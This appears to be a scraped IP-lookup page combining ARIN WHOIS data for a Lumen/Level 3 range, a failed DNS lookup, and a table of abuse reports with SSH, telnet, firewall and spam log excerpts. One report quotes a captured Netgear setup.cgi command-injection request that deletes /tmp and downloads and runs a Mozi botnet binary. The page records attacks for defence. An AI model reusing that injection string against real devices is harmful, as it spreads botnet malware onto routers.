城市(city): unknown
省份(region): unknown
国家(country): United States
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
#
# Copyright 1997-2026, American Registry for Internet Numbers, Ltd.
#
NetRange: 4.0.0.0 - 4.127.255.255
CIDR: 4.0.0.0/9
NetName: LVLT-ORG-4-8
NetHandle: NET-4-0-0-0-1
Parent: NET4 (NET-4-0-0-0-0)
NetType: Direct Allocation
OriginAS:
Organization: Level 3 Parent, LLC (LPL-141)
RegDate: 1992-12-01
Updated: 2019-07-17
Ref: https://rdap.arin.net/registry/ip/4.0.0.0
OrgName: Level 3 Parent, LLC
OrgId: LPL-141
Address: 100 CenturyLink Drive
City: Monroe
StateProv: LA
PostalCode: 71203
Country: US
RegDate: 2018-02-06
Updated: 2024-06-17
Comment: USAGE OF IP SPACE MUST COMPLY WITH OUR ACCEPTABLE USE POLICY:
Comment: https://www.lumen.com/en-us/about/legal/acceptable-use-policy.html
Comment:
Comment: ADDRESSES COVERED BY THIS ORG-ID ARE NON-PORTABLE ANY ISP ANNOUNCING OR TRANSITING PORTIONS WITHIN OUR RANGES SHOULD NOT RELY ON PRESENTED LOA'S OR OLD WHOIS UNLESS THOSE RANGES ARE ALSO ACTIVELY DIRECTLY ANNOUNCED TO A LUMEN ASN. WITH ALL LOA'S THESE CONDITIONS APPLY:
Comment:
Comment: 1. You are permitted to route the Lumen IP prefixes listed via Public BGP to your alternate ISP from the designated ASN. Any other ASN originating the prefix listed is forbidden.
Comment: 2. The Lumen IP prefixes listed can be routed via Public BGP to your alternate ISP as long as you remain an active customer with Lumen and continue to route the prefixes over at least one Lumen Internet circuit without significant traffic engineering.
Comment: 3. Should your Internet services with Lumen be discontinued, Lumen reserves the right to have your alternate ISP terminate the routing of the Lumen IP prefixes without advanced notification, should you fail to do so.
Comment: 4. All IP Addresses assigned or allocated by Lumen to an end-user (customer or ISP) shall be considered non-portable and will be reclaimed by Lumen upon service termination.
Comment: 5. Lumen reserves the right to conduct audits to ensure the LOA conditions are being met.
Comment: 6. Usage of IP space must comply with our AUP https://www.lumen.com/en-us/about/legal/acceptable-use-policy.html
Comment:
Comment: Our looking glass is located at: https://lookingglass.centurylink.com/
Comment:
Comment: For subpoena or court order please fax 844.254.5800 or refer to our Trust & Safety page:
Comment: https://www.lumen.com/en-us/about/legal/trust-center/trust-and-safety.html
Comment:
Comment: For abuse issues, please email abuse@aup.lumen.com
Comment: All abuse reports MUST include:
Comment: * src IP
Comment: * dest IP (your IP)
Comment: * dest port
Comment: * Accurate date/timestamp and timezone of activity
Comment: * Intensity/frequency (short log extracts)
Comment: * Your contact details (phone and email)
Comment: Without these we will be unable to identify the correct owner of the IP address at that point in time.
Ref: https://rdap.arin.net/registry/entity/LPL-141
OrgAbuseHandle: LAC56-ARIN
OrgAbuseName: L3 Abuse Contact
OrgAbusePhone: +1-877-453-8353
OrgAbuseEmail: abuse@level3.com
OrgAbuseRef: https://rdap.arin.net/registry/entity/LAC56-ARIN
OrgRoutingHandle: RPKIR-ARIN
OrgRoutingName: RPKI-ROA
OrgRoutingPhone: +1-877-886-6515
OrgRoutingEmail: rpki-roa@lumen.com
OrgRoutingRef: https://rdap.arin.net/registry/entity/RPKIR-ARIN
OrgTechHandle: APL7-ARIN
OrgTechName: ADMIN POC LVLT
OrgTechPhone: +1-877-453-8353
OrgTechEmail: ipadmin@lumen.com
OrgTechRef: https://rdap.arin.net/registry/entity/APL7-ARIN
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
#
# Copyright 1997-2026, American Registry for Internet Numbers, Ltd.
#
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 4.24.25.75
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 64404
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;4.24.25.75. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2026040501 1800 900 604800 86400
;; Query time: 7 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Mon Apr 06 12:17:55 CST 2026
;; MSG SIZE rcvd: 103
Host 75.25.24.4.in-addr.arpa. not found: 3(NXDOMAIN)
Server: 183.60.83.19
Address: 183.60.83.19#53
** server can't find 75.25.24.4.in-addr.arpa: NXDOMAIN
| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 171.244.140.174 | attackspambots | May 7 10:50:01 sip sshd[26410]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=171.244.140.174 May 7 10:50:03 sip sshd[26410]: Failed password for invalid user kamonwan from 171.244.140.174 port 60480 ssh2 May 7 10:59:58 sip sshd[30061]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=171.244.140.174 |
2020-05-07 17:22:43 |
| 80.82.65.60 | attackbots | May 7 10:47:42 debian-2gb-nbg1-2 kernel: \[11100148.279799\] \[UFW BLOCK\] IN=eth0 OUT= MAC=96:00:00:0e:18:f4:d2:74:7f:6e:37:e3:08:00 SRC=80.82.65.60 DST=195.201.40.59 LEN=40 TOS=0x00 PREC=0x00 TTL=247 ID=11382 PROTO=TCP SPT=58026 DPT=45236 WINDOW=1024 RES=0x00 SYN URGP=0 |
2020-05-07 17:10:16 |
| 96.57.58.10 | attackbotsspam | Attempting to access xmlrpc.php |
2020-05-07 17:31:49 |
| 162.212.114.133 | attackspambots | /setup.cgi%3Fnext_file=netgear.cfg%26todo=syscmd%26cmd=rm+-rf+/tmp/*;wget+http://162.212.114.133:48548/Mozi.m+-O+/tmp/netgear;sh+netgear%26curpath=/%26currentsetting.htm=1 |
2020-05-07 17:28:13 |
| 46.97.198.45 | attackbotsspam | 2020-05-0705:50:341jWXXw-0006nD-U9\<=info@whatsup2013.chH=\(localhost\)[60.194.241.132]:37550P=esmtpsaX=TLS1.2:ECDHE-RSA-AES256-GCM-SHA384:256CV=noA=dovecot_login:info@whatsup2013.chS=3168id=aaf64013183319118d883e927581abb72a12d7@whatsup2013.chT="Willyoubemytruelove\?"forjamieryan.jamieryanjamieryan@outlook.comcometgo2alaska@gmail.com2020-05-0705:50:551jWXYl-0006rf-2L\<=info@whatsup2013.chH=\(localhost\)[46.97.198.45]:3270P=esmtpsaX=TLS1.2:ECDHE-RSA-AES256-GCM-SHA384:256CV=noA=dovecot_login:info@whatsup2013.chS=3154id=8e0217b2b99247b497699fccc7132a0625cfc60abd@whatsup2013.chT="fromJenicetolongbeach62"forlongbeach62@hotmail.comwli@gmail.com2020-05-0705:50:461jWXYb-0006qj-78\<=info@whatsup2013.chH=\(localhost\)[64.119.197.139]:60035P=esmtpsaX=TLS1.2:ECDHE-RSA-AES256-GCM-SHA384:256CV=noA=dovecot_login:info@whatsup2013.chS=3202id=84e93cc6cde633c0e31debb8b3675e7251bb5f716f@whatsup2013.chT="Iwishtobeloved"forusnavyseabees2001@yahoo.comalexanderk751@gmail.com2020-05-0705:51:161jWXZ2-0006sH-NB\<=info@whatsup201 |
2020-05-07 17:04:00 |
| 138.197.213.227 | attackbotsspam | May 7 05:58:40 vps46666688 sshd[28169]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.197.213.227 May 7 05:58:42 vps46666688 sshd[28169]: Failed password for invalid user jeff from 138.197.213.227 port 45016 ssh2 ... |
2020-05-07 17:06:07 |
| 103.21.53.11 | attackbotsspam | (sshd) Failed SSH login from 103.21.53.11 (IN/India/-): 5 in the last 3600 secs |
2020-05-07 17:15:47 |
| 37.119.104.53 | attack | $f2bV_matches |
2020-05-07 17:12:54 |
| 45.14.150.130 | attackspambots | May 7 10:47:46 OPSO sshd\[16109\]: Invalid user matriz from 45.14.150.130 port 49466 May 7 10:47:46 OPSO sshd\[16109\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=45.14.150.130 May 7 10:47:48 OPSO sshd\[16109\]: Failed password for invalid user matriz from 45.14.150.130 port 49466 ssh2 May 7 10:56:09 OPSO sshd\[17483\]: Invalid user sonicwall from 45.14.150.130 port 59324 May 7 10:56:09 OPSO sshd\[17483\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=45.14.150.130 |
2020-05-07 17:30:17 |
| 46.35.19.18 | attackbots | May 7 03:55:12 game-panel sshd[32310]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=46.35.19.18 May 7 03:55:13 game-panel sshd[32310]: Failed password for invalid user divya from 46.35.19.18 port 42059 ssh2 May 7 04:00:36 game-panel sshd[32531]: Failed password for root from 46.35.19.18 port 46619 ssh2 |
2020-05-07 17:44:49 |
| 60.194.241.132 | attack | Unauthorized connection attempt detected from IP address 60.194.241.132 to port 23 [T] |
2020-05-07 17:04:52 |
| 68.187.220.146 | attackbots | May 7 11:06:50 pve1 sshd[4021]: Failed password for root from 68.187.220.146 port 34550 ssh2 ... |
2020-05-07 17:11:30 |
| 180.254.84.90 | attack | May 7 03:50:30 system,error,critical: login failure for user admin from 180.254.84.90 via telnet May 7 03:50:32 system,error,critical: login failure for user root from 180.254.84.90 via telnet May 7 03:50:33 system,error,critical: login failure for user root from 180.254.84.90 via telnet May 7 03:50:35 system,error,critical: login failure for user guest from 180.254.84.90 via telnet May 7 03:50:36 system,error,critical: login failure for user admin from 180.254.84.90 via telnet May 7 03:50:37 system,error,critical: login failure for user root from 180.254.84.90 via telnet May 7 03:50:38 system,error,critical: login failure for user supervisor from 180.254.84.90 via telnet May 7 03:50:39 system,error,critical: login failure for user admin from 180.254.84.90 via telnet May 7 03:50:40 system,error,critical: login failure for user root from 180.254.84.90 via telnet May 7 03:50:41 system,error,critical: login failure for user root from 180.254.84.90 via telnet |
2020-05-07 17:29:29 |
| 117.50.62.33 | attackbotsspam | May 7 06:04:24 OPSO sshd\[32326\]: Invalid user duke from 117.50.62.33 port 51430 May 7 06:04:24 OPSO sshd\[32326\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.50.62.33 May 7 06:04:27 OPSO sshd\[32326\]: Failed password for invalid user duke from 117.50.62.33 port 51430 ssh2 May 7 06:08:54 OPSO sshd\[1219\]: Invalid user cordeiro from 117.50.62.33 port 41784 May 7 06:08:54 OPSO sshd\[1219\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.50.62.33 |
2020-05-07 17:21:01 |
| 106.37.72.121 | attackspam | May 7 06:57:38 mout sshd[28592]: Invalid user nix from 106.37.72.121 port 36165 |
2020-05-07 17:28:39 |